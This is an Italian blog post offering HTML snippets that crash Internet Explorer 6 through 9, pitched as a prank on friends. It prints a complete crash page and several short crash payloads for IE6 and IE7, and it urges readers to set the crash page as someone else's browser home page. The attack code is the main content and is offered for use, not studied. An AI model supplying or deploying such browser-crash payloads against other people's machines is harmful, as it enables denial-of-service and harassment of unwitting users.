Come far andare in crash Internet Explorer 6, 7, 8 e 9


Volete fare uno scherzetto informatico ai vostri amici convinti che il loro Internet Explorer 6 aggiornato per l’ultima volta durante le guerre puniche sia il miglior browser del mondo? Questa mattina vi siete svegliati con la voglia di appagare tutti i vostri masochismi da geek? Abbiamo quello che fa per voi!
Venghino, signori venghino. Oggi vogliamo farvi scoprire quant’è facile mandare in crash Internet Explorer 6, 7, 8 e 9 volontariamente con del semplicissimo e brevissimo codice HTML da piazzare in un file di testo. E per le versioni più antiquate del browser (la 6.x, per l’appunto), ci sono addirittura sette metodi diversi per mandare tutto a ramengo. Che aspettate a provare?

Come mandare in crash tutte le versioni di IE

Per mandare in crash tutte le versioni di IE basta incollare il codice che segue nel Blocco Note, salvare il risultato con estensione htm (es. iecrash.htm) e aprire la pagina Web generata con il browser di Redmond. Crash istantaneo e assicurato!
<html><head> 
<style type="text/css"> 
#a { 
        margin:0 10px 10px; 
}
 
#b { 
        width:100%; 
}
 
</style> 
<title>IE Crasher</title> 
</head> 
<body> 
<table><tr><td> 
<div id="a"> 
<form id="b"> 
<input type="text" name="test"/> 
</div> 
</td><td width="1"></td></tr></table> 
</body></html>

Siete cattivi fino al midollo (o stupidi, se il PC è il vostro)? Impostate questa pagina, che contiene il codice che fa crashare Internet Explorer, come home page del browser. Qualcuno si farà delle grasse risate.

Come mandare in crash IE 6 e 7

Eccoci arrivati all’amico da redimere, quello che si ostina a usare IE6. Questi codici (ne sono ben 7, ripetiamo) permettono di mandare in crash le versioni più vetuste di Internet Explorer con lo stesso meccanismo del codice visto sopra: si copia nel Blocco Note, si salva come htm e… “boom”.

<input type crash/>

Maggiori informazioni
<body onLoad=”window()”></body>

Maggiori informazioni
<script>for (x in document.write) { document.write(x);}</script>

Maggiori informazioni
<style>*{position:relative}</style><table><input /></table>
<style>@;/</style>

Event handler crash, esempio lungo più di una linea:
Ordered list crash, esempio lungo più di una linea:
Maggiori informazioni, per farlo funzionare bisogna cliccare sul primo elemento dell’elenco.
La maggior parte dei codici è scritta per Internet Explorer 6 ma alcuni dovrebbero andare anche con IE7. Divertitevi!
%d blogger cliccano Mi Piace per questo: